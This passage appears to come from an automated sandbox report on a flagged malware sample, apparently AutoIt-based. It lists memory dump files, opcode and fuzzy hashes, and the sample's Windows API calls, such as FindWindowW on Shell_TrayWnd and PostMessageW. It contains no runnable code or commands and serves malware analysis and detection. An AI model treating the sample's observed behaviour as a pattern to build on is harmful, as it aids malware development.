                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy
                                                                        • String ID: ^B$C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                        • API String ID: 1735881322-4185114329
                                                                        • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                        • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                        • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                        • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                        APIs
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FindMessagePostSleepWindow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 529655941-2988720461
                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D